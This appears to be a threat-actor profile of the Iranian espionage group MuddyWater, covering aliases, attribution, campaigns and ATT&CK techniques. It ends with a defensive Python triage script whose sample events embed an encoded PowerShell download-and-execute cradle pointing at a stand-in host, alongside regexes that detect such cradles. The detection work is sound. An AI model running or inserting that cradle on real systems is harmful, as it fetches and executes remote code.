
MuddyWater

Also known as: Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450, MuddyKrill
Affiliation: Iranian Ministry of Intelligence and Security
Motivation: Espionage
Status: active
Country: Iran
First Seen: 2017
Last Seen: 2026
Target Geographies: Middle East, Asia, Africa, Europe, North America

Executive Summary

MuddyWater is an Iranian state-sponsored cyber-espionage group publicly identified by U.S. Cyber Command and a joint advisory from the FBI, CISA, U.S. Cyber Command Cyber National Mission Force (CNMF), and UK NCSC as a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS). The group is tracked by MITRE ATT&CK as G0069 and is also reported under aliases including Static Kitten, Seedworm, TEMP.Zagros, MERCURY, Mango Sandstorm, and Earth Vetala.

Public government and research reporting describes MuddyWater as active since at least 2017. Its operations have targeted government and private-sector organizations across telecommunications, defense, local government, finance, and oil and natural gas sectors in the Middle East, Asia, Africa, Europe, and North America. MuddyWater maintains an espionage-focused profile, with technical activity built around phishing, exploitation of known vulnerabilities, remote access tooling, credential collection, and post-compromise staging.

Notable Campaigns

2017-present — Government and Commercial Network Targeting

The 2022 joint cybersecurity advisory describes MuddyWater activity against government and commercial networks across multiple regions. The advisory identifies telecommunications, defense, local government, and oil and natural gas organizations as part of the observed target set and provides intrusion patterns including spearphishing, exploitation of known vulnerabilities, and the use of open-source tools.

2021 — Middle East Government Intrusion Tracked by Mandiant

Mandiant reported a 2021 intrusion at a Middle East government customer under the UNC3313 cluster. Mandiant assessed with moderate confidence that UNC3313 was associated with TEMP.Zagros, which public reporting associates with MuddyWater. The intrusion involved targeted phishing, public remote-access software, and malware families including GRAMDOOR and STARWHALE.

2022 — Public Disclosure of MOIS-Linked Malware Activity

U.S. Cyber Command’s Cyber National Mission Force publicly disclosed malware samples and tools associated with Iranian intelligence actors tracked as MuddyWater. The disclosure described the group’s use of open-source tools, side-loading DLLs, obfuscated PowerShell, and JavaScript components used to connect to attacker-controlled infrastructure.

Technical Capabilities

MuddyWater operations rely on social engineering and known-vulnerability exploitation rather than only custom malware. Public reporting describes spearphishing emails, malicious documents, archive files, and links used to initiate access. The group has also exploited publicly known vulnerabilities and used legitimate remote access or remote management tools to maintain access in victim environments.

The group’s tooling has included POWERSTATS, POWGOOP, MORIAGENT, Small Sieve, Canopy, STARWHALE, and GRAMDOOR. CISA and MITRE reporting also document PowerShell, JavaScript, Visual Basic, command shell activity, DLL side-loading, credential-dumping utilities, and staged tool transfer during post-compromise operations.

MuddyWater’s tradecraft includes obfuscating scripts, using legitimate administrative tools, collecting credentials, and transferring additional payloads after initial access. MuddyWater is a persistent intelligence-collection group that blends custom tooling with publicly available offensive security tools and remote access software.

Attribution

Attribution to Iran’s Ministry of Intelligence and Security is documented in the public record. U.S. Cyber Command stated in January 2022 that MuddyWater is a subordinate element within MOIS, and the February 2022 joint advisory from FBI, CISA, CNMF, and UK NCSC repeated that assessment while describing global government and commercial targeting.

MITRE lists Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450, and MuddyKrill as associated group names for MuddyWater. These names are considered public tracking aliases or overlapping reporting labels; attribution of Iran-nexus activity to MuddyWater requires direct evidence or cited source linkage.

MITRE ATT&CK Profile

Initial Access: MuddyWater uses spearphishing attachments and links (T1566.001) and has exploited public-facing applications or known vulnerabilities (T1190) to gain initial access.

Execution: The group uses PowerShell (T1059.001), Windows command shell, JavaScript, and Visual Basic execution paths to run payloads and post-compromise scripts.

Credential Access: Public reporting describes credential-dumping activity, including LSASS memory access (T1003.001) and use of credential theft utilities such as LaZagne.

Command and Control: MuddyWater has transferred tools into victim environments (T1105), used HTTP-based communications, and relied on public or legitimate infrastructure and remote access software during operations.

Collection and Exfiltration: MITRE reporting documents local data staging, archive creation, and exfiltration over command-and-control or cloud storage services in MuddyWater-linked activity.
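As an added example that is not from the advisory, MITRE or any other source cited on this page, the Python below triages constructed process-creation events for the Execution patterns described above (obfuscated PowerShell under T1059.001 and script-host JavaScript): it decodes -EncodedCommand arguments, and flags hidden-window flags and download-and-execute cradles. The image paths, command lines and match strings are constructed assumptions, not indicators from any MuddyWater report.

```python
import base64
import re

def _encode(script: str) -> str:
    # PowerShell's -EncodedCommand carries base64 of the UTF-16LE script text.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample events (image, command line); not real telemetry.
# The first two mimic patterns the profile describes; the third is routine admin use.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -nop -w hidden -enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")),
    ("C:\\Windows\\System32\\wscript.exe", "wscript.exe C:\\Users\\Public\\invoice.js"),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
]

ENC_FLAG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
HIDE_FLAGS = re.compile(r"(?i)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|noni|noninteractive)")
CRADLE = re.compile(r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|iwr|iex|invoke-expression|net\.webclient)")

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(image: str, cmdline: str) -> dict:
    """Collect human-readable reasons an event resembles the described execution tradecraft."""
    reasons = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
    if HIDE_FLAGS.search(cmdline):
        reasons.append("hidden/noprofile flags")
    if CRADLE.search(cmdline + " " + (decoded or "")):  # inspect the decoded text too
        reasons.append("download/execute cradle")
    if image.lower().endswith(("wscript.exe", "cscript.exe")) and re.search(r"(?i)\.js\b", cmdline):
        reasons.append("script host running JavaScript")
    return {"image": image, "decoded": decoded, "reasons": reasons}

def triage(events):
    """Return only the events that produced at least one reason, for analyst review."""
    return [r for r in (score_event(img, cmd) for img, cmd in events) if r["reasons"]]
```

Run against real process-creation telemetry (e.g. Sysmon event 1 or Windows 4688) only as a first-pass filter; the decoded text is what an analyst should actually read.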

Sources & References